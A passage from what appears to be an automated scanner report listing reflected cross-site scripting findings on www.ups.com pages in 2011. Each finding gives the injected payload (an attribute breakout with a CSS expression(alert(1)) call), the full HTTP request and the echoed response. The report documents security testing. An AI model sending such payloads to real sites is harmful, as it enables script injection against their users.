<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usab43b"style="x:expression(alert(1))"d5a4fd981ac/en/register/help/index.html">
...[SNIP]...

1.353. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f was submitted in the REST URL parameter 3. This input was echoed as 3b516"style="x:expression(alert(1))"bdd9fbd3d6f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/en3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en3b516"style="x:expression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav">
...[SNIP]...

1.354. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e was submitted in the REST URL parameter 2. This input was echoed as 7ae54"style="x:expression(alert(1))"37c623b859e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7ae54"style="x:expression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav">
...[SNIP]...

1.355. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea was submitted in the REST URL parameter 3. This input was echoed as f552a"style="x:expression(alert(1))"4ebe5159dea in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/enf552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea/register/reasons/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf552a"style="x:expression(alert(1))"4ebe5159dea/register/reasons/index.html">
...[SNIP]...

1.356. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5693e"style%3d"x%3aexpression(alert(1))"d23773eb856 was submitted in the REST URL parameter 2. This input was echoed as 5693e"style="x:expression(alert(1))"d23773eb856 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us5693e"style%3d"x%3aexpression(alert(1))"d23773eb856/en/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5693e"style="x:expression(alert(1))"d23773eb856/en/resources/index.html">
...[SNIP]...

1.357. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c78"style%3d"x%3aexpression(alert(1))"8743722626c was submitted in the REST URL parameter 3. This input was echoed as b4c78"style="x:expression(alert(1))"8743722626c in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/enb4c78"style%3d"x%3aexpression(alert(1))"8743722626c/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb4c78"style="x:expression(alert(1))"8743722626c/resources/index.html">
...[SNIP]...

1.358. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295 was submitted in the REST URL parameter 2. This input was echoed as 5b225"style="x:expression(alert(1))"51c06fe1295 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295/en/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5b225"style="x:expression(alert(1))"51c06fe1295/en/resources/pay/index.html">
...[SNIP]...

1.359. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c was submitted in the REST URL parameter 3. This input was echoed as 70de7"style="x:expression(alert(1))"2a2e6173e9c in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/en70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en70de7"style="x:expression(alert(1))"2a2e6173e9c/resources/pay/index.html">
...[SNIP]...

1.360. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5219"style%3d"x%3aexpression(alert(1))"8878c7088f8 was submitted in the REST URL parameter 2. This input was echoed as b5219"style="x:expression(alert(1))"8878c7088f8 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/usb5219"style%3d"x%3aexpression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb5219"style="x:expression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html">
...[SNIP]...

1.361. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edff4"style%3d"x%3aexpression(alert(1))"804f67be8a3 was submitted in the REST URL parameter 3. This input was echoed as edff4"style="x:expression(alert(1))"804f67be8a3 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/enedff4"style%3d"x%3aexpression(alert(1))"804f67be8a3/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enedff4"style="x:expression(alert(1))"804f67be8a3/resources/service/delivery_change.html">
...[SNIP]...

1.362. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8721"style%3d"x%3aexpression(alert(1))"28636025260 was submitted in the REST URL parameter 2. This input was echoed as d8721"style="x:expression(alert(1))"28636025260 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/usd8721"style%3d"x%3aexpression(alert(1))"28636025260/en/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd8721"style="x:expression(alert(1))"28636025260/en/resources/service/index.html">
...[SNIP]...

1.363. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076 was submitted in the REST URL parameter 3. This input was echoed as 13f5b"style="x:expression(alert(1))"13ae836b076 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/en13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en13f5b"style="x:expression(alert(1))"13ae836b076/resources/service/index.html">
...[SNIP]...

1.364. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a12"style%3d"x%3aexpression(alert(1))"cb99259b504 was submitted in the REST URL parameter 2. This input was echoed as 98a12"style="x:expression(alert(1))"cb99259b504 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us98a12"style%3d"x%3aexpression(alert(1))"cb99259b504/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us98a12"style="x:expression(alert(1))"cb99259b504/en/resources/ship/fraud.html">
...[SNIP]...

1.365. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4 was submitted in the REST URL parameter 3. This input was echoed as 429db"style="x:expression(alert(1))"4ada58a2fc4 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/en429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en429db"style="x:expression(alert(1))"4ada58a2fc4/resources/ship/fraud.html">
...[SNIP]...

1.366. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0 was submitted in the REST URL parameter 2. This input was echoed as 7790d"style="x:expression(alert(1))"6af3f34d8c0 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0/en/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7790d"style="x:expression(alert(1))"6af3f34d8c0/en/resources/ship/index.html">
...[SNIP]...

1.367. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb was submitted in the REST URL parameter 3. This input was echoed as 38e38"style="x:expression(alert(1))"dfe01cfd7cb in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/en38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en38e38"style="x:expression(alert(1))"dfe01cfd7cb/resources/ship/index.html">
...[SNIP]...

1.368. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2 was submitted in the REST URL parameter 2. This input was echoed as be5e8"style="x:expression(alert(1))"2bd8dfca6c2 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/usbe5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
